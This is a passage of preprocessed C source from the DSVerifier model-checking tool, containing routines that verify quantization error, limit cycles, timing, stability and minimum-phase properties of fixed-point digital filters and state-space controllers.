for (i = 0; i < X_SIZE_VALUE; ++i) {
shiftL(x[i], xaux, ds.b_size);
y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size);
shiftL(y[i], yaux, ds.a_size);
shiftLDouble(xf[i], xfaux, ds.b_size);
yf[i] = double_direct_form_1(yfaux, xfaux, ds.a, ds.b, ds.a_size, ds.b_size);
shiftLDouble(yf[i], yfaux, ds.a_size);
# 169 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error.h"
double absolute_error = yf[i] - fxp_to_double(y[i]);
__DSVERIFIER_assert(absolute_error < (impl.max_error) && absolute_error > (-impl.max_error));
}
return 0;
}
# 35 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 1
# 13 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
extern digital_system ds;
extern implementation impl;
int verify_zero_input_limit_cycle(void){
overflow_mode = 3;
int i,j;
int Set_xsize_at_least_two_times_Na = 2 * ds.a_size;
printf("X_SIZE must be at least 2 * ds.a_size");
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
((void) sizeof ((
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
) ; else __assert_fail (
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
"X_SIZE_VALUE >= Set_xsize_at_least_two_times_Na"
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h", 23, __extension__ __PRETTY_FUNCTION__); }))
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
;
fxp_t a_fxp[ds.a_size];
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
# 71 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
fxp_t y[X_SIZE_VALUE];
fxp_t x[X_SIZE_VALUE];
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = 0;
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
fxp_t yaux[ds.a_size];
fxp_t xaux[ds.b_size];
fxp_t waux[Nw];
fxp_t y0[ds.a_size];
fxp_t w0[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = nondet_int();
__DSVERIFIER_assume(yaux[i] >= min_fxp && yaux[i] <= max_fxp);
y0[i] = yaux[i];
}
# 111 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
fxp_t xk, temp;
fxp_t *aptr, *bptr, *xptr, *yptr, *wptr;
for(i=0; i<X_SIZE_VALUE; ++i){
shiftL(x[i], xaux, ds.b_size);
y[i] = fxp_direct_form_1(yaux, xaux, a_fxp, b_fxp, ds.a_size, ds.b_size);
shiftL(y[i], yaux, ds.a_size);
# 188 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_zero_input_limit_cycle.h"
}
fxp_check_persistent_limit_cycle(y, X_SIZE_VALUE);
return 0;
}
# 36 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 1
# 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
int nondet_int();
float nondet_float();
extern digital_system ds;
extern implementation impl;
extern hardware hw;
int generic_timer = 0;
int verify_generic_timing(void) {
double y[X_SIZE_VALUE];
double x[X_SIZE_VALUE];
int i;
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_float();
__DSVERIFIER_assume(x[i] >= impl.min && x[i] <= impl.max);
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
double yaux[ds.a_size];
double xaux[ds.b_size];
double waux[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
}
double xk, temp;
double *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
double initial_timer = generic_timer;
for (i = 0; i < X_SIZE_VALUE; ++i) {
generic_timer += ((2 * hw.assembly.ldd) + (1 * hw.assembly.adiw) + (2 * hw.assembly.std));
generic_timer += ((2 * hw.assembly.ldd) + (1 * hw.assembly.cpi) + (1 * hw.assembly.cpc) + (1 * hw.assembly.brlt));
generic_timing_shift_l_double(x[i], xaux, ds.b_size);
y[i] = generic_timing_double_direct_form_1(yaux, xaux, ds.a, ds.b, ds.a_size, ds.b_size);
generic_timing_shift_l_double(y[i], yaux, ds.a_size);
# 88 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
double spent_time = (((double) generic_timer) * hw.cycle);
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
((void) sizeof ((
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
spent_time <= ds.sample_time
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
spent_time <= ds.sample_time
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
) ; else __assert_fail (
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
"spent_time <= ds.sample_time"
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h", 89, __extension__ __PRETTY_FUNCTION__); }))
# 89 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_generic_timing.h"
;
generic_timer = initial_timer;
}
return 0;
}
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h" 1
# 16 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h"
int nondet_int();
float nondet_float();
extern digital_system ds;
extern implementation impl;
int verify_timing_msp_430(void) {
double y[X_SIZE_VALUE];
double x[X_SIZE_VALUE];
int i;
for (i = 0; i < X_SIZE_VALUE; ++i) {
y[i] = 0;
x[i] = nondet_float();
__DSVERIFIER_assume(x[i] >= impl.min && x[i] <= impl.max);
}
int Nw = 0;
Nw = ds.a_size > ds.b_size ? ds.a_size : ds.b_size;
double yaux[ds.a_size];
double xaux[ds.b_size];
double waux[Nw];
for (i = 0; i < ds.a_size; ++i) {
yaux[i] = 0;
}
for (i = 0; i < ds.b_size; ++i) {
xaux[i] = 0;
}
for (i = 0; i < Nw; ++i) {
waux[i] = 0;
}
double xk, temp;
double *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for (i = 0; i < X_SIZE_VALUE; ++i) {
shiftL(x[i], xaux, ds.b_size);
y[i] = double_direct_form_1_MSP430(yaux, xaux, ds.a, ds.b, ds.a_size, ds.b_size);
shiftL(y[i], yaux, ds.a_size);
# 121 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_timing_msp430.h"
}
return 0;
}
# 38 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 1
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
extern digital_system ds;
extern implementation impl;
int verify_stability(void){
overflow_mode = 0;
fxp_t a_fxp[ds.a_size];
fxp_double_to_fxp_array(ds.a, a_fxp, ds.a_size);
double _a[ds.a_size];
fxp_to_double_array(_a, a_fxp, ds.a_size);
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
((void) sizeof ((
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
check_stability(_a, ds.a_size)
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
check_stability(_a, ds.a_size)
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
) ; else __assert_fail (
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
"check_stability(_a, ds.a_size)"
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h", 37, __extension__ __PRETTY_FUNCTION__); }))
# 37 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
;
# 83 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability.h"
return 0;
}
# 39 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h" 1
# 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h"
extern digital_system ds;
extern implementation impl;
int verify_minimum_phase(void){
overflow_mode = 0;
fxp_t b_fxp[ds.b_size];
fxp_double_to_fxp_array(ds.b, b_fxp, ds.b_size);
double _b[ds.b_size];
fxp_to_double_array(_b, b_fxp, ds.b_size);
__DSVERIFIER_assert(check_stability(_b, ds.b_size));
# 85 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_minimum_phase.h"
return 0;
}
# 40 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h" 1
# 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h"
extern digital_system plant;
extern digital_system plant_cbmc;
extern digital_system controller;
int verify_stability_closedloop_using_dslib(void){
double * c_num = controller.b;
int c_num_size = controller.b_size;
double * c_den = controller.a;
int c_den_size = controller.a_size;
fxp_t c_num_fxp[controller.b_size];
fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size);
fxp_t c_den_fxp[controller.a_size];
fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size);
double c_num_qtz[controller.b_size];
fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size);
double c_den_qtz[controller.a_size];
fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size);
# 48 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h"
double * p_num = plant_cbmc.b;
int p_num_size = plant.b_size;
double * p_den = plant_cbmc.a;
int p_den_size = plant.a_size;
double ans_num[100];
int ans_num_size = controller.b_size + plant.b_size - 1;
double ans_den[100];
int ans_den_size = controller.a_size + plant.a_size - 1;
# 68 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_stability_closedloop.h"
printf("Verifying stability for closedloop function\n");
__DSVERIFIER_assert(check_stability_closedloop(ans_den, ans_den_size, p_num, p_num_size, p_den, p_den_size));
return 0;
}
# 41 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h" 1
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h"
extern digital_system plant;
extern digital_system plant_cbmc;
extern digital_system controller;
double nondet_double();
int verify_limit_cycle_closed_loop(void){
overflow_mode = 3;
double * c_num = controller.b;
int c_num_size = controller.b_size;
double * c_den = controller.a;
int c_den_size = controller.a_size;
fxp_t c_num_fxp[controller.b_size];
fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size);
fxp_t c_den_fxp[controller.a_size];
fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size);
double c_num_qtz[controller.b_size];
fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size);
double c_den_qtz[controller.a_size];
fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size);
# 58 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h"
double * p_num = plant_cbmc.b;
int p_num_size = plant.b_size;
double * p_den = plant_cbmc.a;
int p_den_size = plant.a_size;
double ans_num[100];
int ans_num_size = controller.b_size + plant.b_size - 1;
double ans_den[100];
int ans_den_size = controller.a_size + plant.a_size - 1;
int i;
double y[X_SIZE_VALUE];
double x[X_SIZE_VALUE];
double xaux[ans_num_size];
double nondet_constant_input = nondet_double();
__DSVERIFIER_assume(nondet_constant_input >= impl.min && nondet_constant_input <= impl.max);
for (i = 0; i < X_SIZE_VALUE; ++i) {
x[i] = nondet_constant_input;
y[i] = 0;
}
for (i = 0; i < ans_num_size; ++i) {
xaux[i] = nondet_constant_input;
}
double yaux[ans_den_size];
double y0[ans_den_size];
int Nw = ans_den_size > ans_num_size ? ans_den_size : ans_num_size;
double waux[Nw];
double w0[Nw];
for (i = 0; i < ans_den_size; ++i) {
yaux[i] = nondet_int();
__DSVERIFIER_assume(yaux[i] >= impl.min && yaux[i] <= impl.max);
y0[i] = yaux[i];
}
# 112 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h"
double xk, temp;
double *aptr, *bptr, *xptr, *yptr, *wptr;
int j;
for(i=0; i<X_SIZE_VALUE; ++i){
shiftLDouble(x[i], xaux, ans_num_size);
y[i] = double_direct_form_1(yaux, xaux, ans_den, ans_num, ans_den_size, ans_num_size);
shiftLDouble(y[i], yaux, ans_den_size);
# 137 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_limit_cycle_closedloop.h"
}
double_check_persistent_limit_cycle(y, X_SIZE_VALUE);
return 0;
}
# 42 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h" 1
# 23 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h"
extern digital_system plant;
extern digital_system plant_cbmc;
extern digital_system controller;
int verify_error_closedloop(void){
overflow_mode = 3;
double * c_num = controller.b;
int c_num_size = controller.b_size;
double * c_den = controller.a;
int c_den_size = controller.a_size;
fxp_t c_num_fxp[controller.b_size];
fxp_double_to_fxp_array(c_num, c_num_fxp, controller.b_size);
fxp_t c_den_fxp[controller.a_size];
fxp_double_to_fxp_array(c_den, c_den_fxp, controller.a_size);
double c_num_qtz[controller.b_size];
fxp_to_double_array(c_num_qtz, c_num_fxp, controller.b_size);
double c_den_qtz[controller.a_size];
fxp_to_double_array(c_den_qtz, c_den_fxp, controller.a_size);
# 56 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h"
double * p_num = plant_cbmc.b;
int p_num_size = plant.b_size;
double * p_den = plant_cbmc.a;
int p_den_size = plant.a_size;
double ans_num_double[100];
double ans_num_qtz[100];
int ans_num_size = controller.b_size + plant.b_size - 1;
double ans_den_qtz[100];
double ans_den_double[100];
int ans_den_size = controller.a_size + plant.a_size - 1;
# 77 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h"
int i;
double y_qtz[X_SIZE_VALUE];
double y_double[X_SIZE_VALUE];
double x_qtz[X_SIZE_VALUE];
double x_double[X_SIZE_VALUE];
double xaux_qtz[ans_num_size];
double xaux_double[ans_num_size];
double xaux[ans_num_size];
double nondet_constant_input = nondet_double();
__DSVERIFIER_assume(nondet_constant_input >= impl.min && nondet_constant_input <= impl.max);
for (i = 0; i < X_SIZE_VALUE; ++i) {
x_qtz[i] = nondet_constant_input;
x_double[i] = nondet_constant_input;
y_qtz[i] = 0;
y_double[i] = 0;
}
for (i = 0; i < ans_num_size; ++i) {
xaux_qtz[i] = nondet_constant_input;
xaux_double[i] = nondet_constant_input;
}
double yaux_qtz[ans_den_size];
double yaux_double[ans_den_size];
double y0_qtz[ans_den_size];
double y0_double[ans_den_size];
int Nw = ans_den_size > ans_num_size ? ans_den_size : ans_num_size;
double waux_qtz[Nw];
double waux_double[Nw];
double w0_qtz[Nw];
double w0_double[Nw];
for (i = 0; i < ans_den_size; ++i) {
yaux_qtz[i] = 0;
yaux_double[i] = 0;
}
for(i=0; i<X_SIZE_VALUE; ++i){
shiftLDouble(x_qtz[i], xaux_qtz, ans_num_size);
y_qtz[i] = double_direct_form_1(yaux_qtz, xaux_qtz, ans_den_qtz, ans_num_qtz, ans_den_size, ans_num_size);
shiftLDouble(y_qtz[i], yaux_qtz, ans_den_size);
shiftLDouble(x_double[i], xaux_double, ans_num_size);
y_double[i] = double_direct_form_1(yaux_double, xaux_double, ans_den_double, ans_num_double, ans_den_size, ans_num_size);
shiftLDouble(y_double[i], yaux_double, ans_den_size);
# 156 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_closedloop.h"
double absolute_error = y_double[i] - fxp_to_double(y_qtz[i]);
__DSVERIFIER_assert(absolute_error < (impl.max_error) && absolute_error > (-impl.max_error));
}
return 0;
}
# 43 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 1
# 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
extern digital_system_state_space _controller;
extern double error_limit;
extern int closed_loop;
double new_state[4][4];
double new_stateFWL[4][4];
digital_system_state_space _controller_fxp;
digital_system_state_space _controller_double;
double ss_system_quantization_error(fxp_t inputs){
digital_system_state_space __backupController;
int i;
int j;
_controller.inputs[0][0] = inputs;
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
__backupController.A[i][j]= (_controller.A[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
__backupController.B[i][j]= (_controller.B[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
__backupController.C[i][j]= (_controller.C[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
__backupController.D[i][j]= (_controller.D[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
__backupController.states[i][j]= (_controller.states[i][j]);
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
__backupController.inputs[i][j]= (_controller.inputs[i][j]);
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
__backupController.outputs[i][j]= (_controller.outputs[i][j]);
}
}
double __quant_error = 0.0;
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j]= (new_state[i][j]);
}
}
double output_double = double_state_space_representation();
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_state[i][j]= (_controller.states[i][j]);
}
}
__backupController.inputs[0][0] = inputs;
for(i=0; i<nStates;i++){
for(j=0; j<nStates;j++){
_controller.A[i][j] = __backupController.A[i][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<nInputs;j++){
_controller.B[i][j] = __backupController.B[i][j];
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nStates;j++){
_controller.C[i][j] = __backupController.C[i][j];
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
_controller.D[i][j] = __backupController.D[i][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j] = __backupController.states[i][j];
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
_controller.inputs[i][j] = __backupController.inputs[i][j];
}
}
for(i=0; i<nOutputs;i++){
for(j=0; j<1;j++){
_controller.outputs[i][j] = __backupController.outputs[i][j];
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
_controller.states[i][j]= (new_stateFWL[i][j]);
}
}
double output_fxp = fxp_state_space_representation();
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_stateFWL[i][j]= (_controller.states[i][j]);
}
}
__quant_error = output_double - output_fxp;
return __quant_error;
}
double fxp_ss_closed_loop_quantization_error(double reference){
double reference_aux[4][4];
double result1[4][4];
double temp_result1[4][4];
double result2[4][4];
double temp_states[4][4];
fxp_t K_fxp[4][4];
fxp_t states_fxp[4][4];
fxp_t result_fxp[4][4];
unsigned int i;
unsigned int j;
unsigned int k;
short unsigned int flag = 0;
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
if(_controller_fxp.D[i][j] != 0){
flag = 1;
}
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
reference_aux[i][j]=0;
K_fxp[i][j] = 0;
}
}
for(i=0; i<nInputs;i++){
reference_aux[i][0]= reference;
}
for(i=0; i<4;i++){
states_fxp[i][0]=0;
}
for(i=0; i<nStates;i++){
K_fxp[0][i]= fxp_double_to_fxp(_controller_fxp.K[0][i]);
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
for(k=0; k<nStates;k++)
{
states_fxp[k][0]= fxp_double_to_fxp(_controller_fxp.states[k][0]);
}
fxp_matrix_multiplication(nOutputs,nStates,nStates,1,K_fxp,states_fxp,result_fxp);
fxp_t reference_fxp[4][4];
fxp_t result_fxp2[4][4];
for(k=0;k<nInputs;k++)
{
reference_fxp[k][0] =fxp_double_to_fxp(fxp_quantize(reference_aux[k][0]));
}
fxp_sub_matrix(nInputs,1, reference_fxp, result_fxp, result_fxp2);
for(k=0; k<nInputs;k++)
{
_controller_fxp.inputs[k][0] = fxp_to_double(fxp_quantize(result_fxp2[k][0]));
}
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_fxp.C,_controller_fxp.states,result1);
if(flag == 1)
{
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller_fxp.D,_controller_fxp.inputs,result2);
}
double_add_matrix(nOutputs,1,result1,result2,_controller_fxp.outputs);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller_fxp.A,_controller_fxp.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller_fxp.B,_controller_fxp.inputs,result2);
double_add_matrix(nStates,1,result1,result2,_controller_fxp.states);
return _controller_fxp.outputs[0][0];
}
double ss_closed_loop_quantization_error(double reference){
double reference_aux[4][4];
double result1[4][4];
double result2[4][4];
unsigned int i;
unsigned int j;
short unsigned int flag = 0;
for(i=0; i<nOutputs;i++){
for(j=0; j<nInputs;j++){
if(_controller_double.D[i][j] != 0){
flag = 1;
}
}
}
for(i=0; i<nInputs;i++){
for(j=0; j<1;j++){
reference_aux[i][j]= reference;
}
}
for(i=0; i<4;i++){
for(j=0; j<4;j++){
result1[i][j]=0;
result2[i][j]=0;
}
}
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_double.K,_controller_double.states,result1);
double_sub_matrix(nInputs,1,reference_aux,result1, _controller_double.inputs);
double_matrix_multiplication(nOutputs,nStates,nStates,1,_controller_double.C,_controller_double.states,result1);
if(flag == 1)
double_matrix_multiplication(nOutputs,nInputs,nInputs,1,_controller_double.D,_controller_double.inputs,result2);
double_add_matrix(nOutputs,1,result1,result2,_controller_double.outputs);
double_matrix_multiplication(nStates,nStates,nStates,1,_controller_double.A,_controller_double.states,result1);
double_matrix_multiplication(nStates,nInputs,nInputs,1,_controller_double.B,_controller_double.inputs,result2);
double_add_matrix(nStates,1,result1,result2,_controller_double.states);
return _controller_double.outputs[0][0];
}
int verify_error_state_space(void){
int i,j;
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_state[i][j]= (_controller.states[i][j]);
}
}
for(i=0; i<nStates;i++){
for(j=0; j<1;j++){
new_stateFWL[i][j]= (_controller.states[i][j]);
}
}
_controller_fxp = _controller;
_controller_double = _controller;
overflow_mode = 0;
fxp_t x[0];
fxp_t min_fxp = fxp_double_to_fxp(impl.min);
fxp_t max_fxp = fxp_double_to_fxp(impl.max);
double nondet_constant_input = nondet_double();
__DSVERIFIER_assume(nondet_constant_input >= min_fxp && nondet_constant_input <= max_fxp);
for (i = 0; i < 0; ++i) {
x[i] = nondet_constant_input;
}
double __quant_error;
if(closed_loop){
for (i = 0; i < 0; ++i) {
__quant_error = ss_closed_loop_quantization_error(x[i]) - fxp_ss_closed_loop_quantization_error(x[i]);
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
((void) sizeof ((
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 354 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/engine/verify_error_state_space.h"
__quant_error < error_limit && __quant_error > ((-1)*error_limit)
